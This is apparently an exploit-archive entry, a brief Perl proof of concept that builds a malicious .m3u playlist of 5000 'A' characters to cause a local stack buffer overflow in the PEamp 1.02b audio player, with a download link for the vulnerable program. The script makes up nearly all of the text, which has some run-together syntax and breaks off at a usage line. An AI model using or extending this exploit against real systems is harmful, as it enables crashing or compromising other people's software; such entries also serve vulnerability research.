PEamp 1.02b Buffer Overflow
PEamp 1.02b .M3U File Local Stack Overflow POC Download: http://files.brothersoft.com/mp3audio/players/mp3player.zip my $chars= "A" x 5000; my $file="dz.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; usage: amp.exe=...